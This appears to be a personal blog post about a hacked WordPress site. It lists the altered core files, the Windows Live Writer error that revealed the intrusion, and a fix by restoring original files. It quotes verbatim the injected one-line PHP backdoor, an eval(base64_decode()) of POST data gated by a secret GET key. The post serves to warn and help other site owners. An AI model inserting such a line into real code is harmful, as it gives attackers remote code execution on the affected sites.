Last January WordPress.net.in has injected codes at my WordPress files in which the following WordPress files has been injected with numbers for SQL
- wp-admin/admin.php
- wp-admin/index.php
- wp-includes/wp-db.php
- wp-includes/pluggable.php
- wp-includes/gettext.php
- wp-includes/default-filters.php
Then again. My site has been hacked, but at this time, it is not completely hacked since I was able to check some wordpress files that has been altered. It can easily be notice if you are using Windows Live Writer. If you are using Windows Live writer and suddenly you encounter ” blog server error-server error-32700 occurred parse error, not well formed “
I saw some string like as follows :
<?php if($_GET[‘aee8d2759ea2c769’]==”e7d557fe37ae8fd6″){ eval(base64_decode($_POST[‘file’])); exit; } ?>
This string should not be installed on either of the WordPress files mentioned above and needs to be deleted. The easiest method of fixing this one is to replace above mentioned files by the original installation files of WordPress that could be downloaded at their site. It is good that I gave a local copy of those files in my computer. Because that the hacked might happen again.
Again I thank gordon.dewis.ca for his post regarding this matter. further reading result good information from Other site
My main index.php was not yet hacked. I believed the hacking is not yet completed. The next time you see an error from your windows live writer. Check your WordPress Installation files.
I have made To do checklist.
- I need to install .htaccess password , maybe somebody would like to make post in doing so 🙂 or I will just have to search via Google.
- Research for more possible security fix for my blog.
- Need to update my plug-ins 🙂
It is good that I am using Windows Live Writer. So next time when your Authoring Tools make some problem try to search immediately at Google the problem that it reports. BTW I need to study this article on wordpress codex.